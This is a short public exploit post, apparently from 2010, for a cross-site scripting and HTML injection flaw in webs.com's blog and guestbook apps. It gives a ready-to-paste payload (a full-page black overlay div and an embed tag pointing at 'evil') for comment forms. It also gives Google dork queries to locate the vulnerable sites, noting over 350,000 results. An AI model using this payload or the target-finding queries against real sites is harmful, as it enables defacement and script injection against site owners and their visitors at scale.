Free Website Creator from webs.com suffers from cross site scripting vulnerabilities.
5dcbb3def163d4bb7e6e9983a1c8a34e2db5060320d90d2d87fbfb5851d5c466
# Exploit Title: webs.com Free Website Creator APPs XSS/HTML Injection
# Date: 8/5/2010
# Author: isoz - http://bioworm.org/forum
# Software Link: http://webs.com
# Version: Any
# Tested on: Any OS
# CVE : -
# Code : [Example:]
Description:
Webs helps you make your own free website. Personal, group, and small
business websites complete with photos, videos, and ecommerce.
POC:
Go to blogs or guestbook and execute the Example codes in the comments
form.
Example:
<div style='top:0px;position:absolute;left:0px;width:
900px;height:1800px;background-color:#000000;color:#FFFF00;text-align:
center;'>
<embed src="evil">
Dorks:
inurl:"webs.com/apps/blog"
inurl:"webs.com/apps/guestbook"
350,000+ results
Greetz:
JMADD ;)